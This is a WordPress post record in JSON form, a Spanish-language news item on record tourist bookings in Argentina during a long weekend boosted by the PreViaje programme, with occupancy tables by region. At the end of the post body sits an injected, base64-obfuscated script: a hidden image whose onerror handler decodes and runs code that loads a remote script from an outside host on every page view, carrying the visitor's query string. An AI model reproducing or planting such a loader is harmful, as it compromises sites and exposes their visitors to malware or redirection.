{"id":7445,"date":"2023-10-17T08:56:13","date_gmt":"2023-10-17T11:56:13","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7445"},"modified":"2025-08-13T15:52:30","modified_gmt":"2025-08-13T18:52:30","slug":"fin-de-semana-extralargo-con-el-impulso-de-previaje-se-espera-un-movimiento-turistico-record","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7445","title":{"rendered":"Fin de semana extralargo: con el impulso de PreViaje, r\u00e9cord de movimiento tur\u00edstico"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#0e5a87\"><em>\u201cVamos a terminar otro a\u00f1o sin temporada baja\u201d, asegur\u00f3 Lammens<\/em><\/h4>\n\n\n\n<p>De acuerdo a los primeros relevamientos del Observatorio Argentino de Turismo (OAT), se espera un&nbsp;<strong>fin de semana extralargo r\u00e9cord<\/strong>, con m\u00e1s de&nbsp;<strong>1,5 millones de turistas<\/strong>&nbsp;y un impacto econ\u00f3mico superior a los&nbsp;<strong>$100 mil millones<\/strong>, impulsado por la quinta edici\u00f3n del programa&nbsp;<strong>PreViaje<\/strong>.<\/p>\n\n\n\n<p>Al intenso movimiento de turismo interno se le suma la llegada masiva de turistas desde Uruguay y Chile. Destinos como&nbsp;<strong>Salta, Esteros del Iber\u00e1, Villa General Belgrano, San Rafael, Mar de las Pampas, Sierra de la Ventana, San Carlos de Bariloche, Puerto Madryn y Esquel<\/strong>&nbsp;ya cuentan con niveles de ocupaci\u00f3n casi plena.<\/p>\n\n\n\n<p><em>\u201cLas datos de reservas que nos van llegando de los distintos puntos del pa\u00eds anticipan un fin de semana extralargo absolutamente r\u00e9cord. PreViaje vuelve a cumplir con el objetivo de que este a\u00f1o nuestros destinos tur\u00edsticos no tengan \u2018temporada baja\u2019 y eso se ve reflejado en los cifras de empleo, donde el sector hotelero-gastron\u00f3mico lidera el crecimiento de este a\u00f1o\u201d<\/em>, asegur\u00f3 el ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;<strong>Mat\u00edas Lammens<\/strong>.<\/p>\n\n\n\n<p><em>\u201cComo dice el ministro Sergio Massa, por su capacidad de generaci\u00f3n de empleo de manera federal y de atracci\u00f3n de divisas genuinas, el turismo est\u00e1 llamado a ser una de las turbinas de la econom\u00eda que le va a permitir al pa\u00eds despegar definitivamente en los pr\u00f3ximos a\u00f1os\u201d<\/em>, agreg\u00f3.<\/p>\n\n\n\n<p><em>\u00abSeg\u00fan los datos del Observatorio Argentino de Turismo de nuestra C\u00e1mara, este fin de semana largo la actividad tur\u00edstica mostrar\u00e1 nuevamente su relevancia econ\u00f3mica con destinos pr\u00e1cticamente colmados en todo el pa\u00eds. Vale destacar, adem\u00e1s, el claro impulso del PreViaje y su eficiencia en cada edici\u00f3n. El turismo es uno de los motores que mueven la econom\u00eda argentina. Por eso, lideramos hace meses la generaci\u00f3n de empleo y mostramos, en cada oportunidad, la capacidad de derrame econ\u00f3mico en todas las actividades que se vinculan con la industria, incluyendo el impacto directo sobre las econom\u00edas regionales\u00bb<\/em>, afirm\u00f3 Gustavo Hani, presidente de la&nbsp;<strong>C\u00e1mara Argentina de Turismo (CAT)<\/strong>.<\/p>\n\n\n\n<p>La quinta edici\u00f3n de PreViaje, que moviliza a m\u00e1s de&nbsp;<strong>500 mil turistas<\/strong>&nbsp;entre el 29 de septiembre y el 17 de octubre, impulsa este movimiento tur\u00edstico r\u00e9cord. El programa del Gobierno Nacional alcanz\u00f3 a 7,5 millones de turistas, con un impacto econ\u00f3mico superior a los&nbsp;<strong>$790 mil millones<\/strong>&nbsp;en sus cinco etapas.<\/p>\n\n\n\n<p>Reservas para el fin de semana extra largo (subir\u00e1 entre un 5% y un 10%)<br>Datos del Observatorio Argentino de Turismo (OAT)<\/p>\n\n\n\n<p>Buenos Aires<br>-Mar del Plata: 75%<br>-Partido de Villa Gesell: 86%<br>-Mar de las Pampas: 98%<br>-Costa del Este: 100%<br>-San Clemente: 91%<br>-San Bernardo: 73%<br>-Caril\u00f3: 80%<br>-Pinamar: 75%<br>-Monte Hermoso: 85%<br>-Tigre: 77%<br>-Sierra de la Ventana: 95%<br>-Tandil: 90%<\/p>\n\n\n\n<p>C\u00f3rdoba<br>-Villa Carlos Paz: 80%<br>-Villa General Belgrano: 95%<br>-San Javier y Yacanto: 95%<br>-La Cumbrecita: 95%<br>-Santa Rosa: 89%<br>-Alta Gracia: 90%<br>-La Cumbre: 89%<br>-Tanti: 90%<br>-La Falda 85%<br>-C\u00f3rdoba Capital: 65%<\/p>\n\n\n\n<p>Litoral<br>-Iguaz\u00fa: 85%<br>-Posadas: 85%<br>-Corrientes Capital: 95%<br>-Colonia Carlos Pellegrini: 94%<br>-Goya: 96%<br>-Curuz\u00fa Cuatia: 93%<br>-Federaci\u00f3n: 90%<br>-Col\u00f3n: 90%<br>-Gualeguaych\u00fa: 82%<br>-Melincu\u00e9: 85%<br>-Santa Fe Ciudad: 90%<br>-Reconquista: 90%<br>-Villa Constituci\u00f3n: 98%<\/p>\n\n\n\n<p>Norte<br>-Salta Capital: 95%<br>-Cafayate: 95%<br>-Quebrada de Humahuaca: 85%<br>-Valles: 66%<br>-San Miguel de Tucum\u00e1n: 75%<br>-Taf\u00ed del Valle: 80%<br>-San Javier: 73%<br>-Yerba Buena: 88%<br>-El Cadillal: 75%<br>-La Rioja Capital: 85%<br>-Chilecito: 90%<br>-Villa Uni\u00f3n: 90%<br>-Catamarca: 70%<\/p>\n\n\n\n<p>Cuyo<br>-San Juan: 75%<br>-Calingasta: 90%<br>-Iglesia:83%<br>-J\u00e1chal:82%<br>-Valle F\u00e9rtil: 83%<br>-Mendoza Capital: 85%<br>-San Rafael: 90%<br>-Potrerillos: 85%<br>-San Luis: 88%<br>-Merlo: 90%<br>-Potrero de los Funes: 95%<br>-San Luis: 95%<br>-Costa de los Comechingones: 90%<br>-San Francisco: 80%<\/p>\n\n\n\n<p>Patagonia<br>-Bariloche: 98%<br>-Viedma: 90%<br>-El Bols\u00f3n: 80%<br>-Esquel: 100%<br>-Puerto Madryn: 98%<br>-San Mart\u00edn de los Andes: 65%<br>-El Calafate: 90%<br>-Ushuaia: 85%<br>-Tolhuin: 96%<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cVamos a terminar otro a\u00f1o sin temporada baja\u201d, asegur\u00f3 Lammens De acuerdo a los primeros relevamientos del Observatorio Argentino de Turismo (OAT), se espera un&nbsp;fin de semana extralargo r\u00e9cord, con m\u00e1s de&nbsp;1,5 millones de turistas&nbsp;y un impacto econ\u00f3mico superior a los&nbsp;$100 mil millones, impulsado por la quinta edici\u00f3n del programa&nbsp;PreViaje. Al intenso movimiento de turismo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7446,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7445","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7445","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7445"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7445\/revisions"}],"predecessor-version":[{"id":10290,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7445\/revisions\/10290"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7446"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7445"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7445"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7445"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}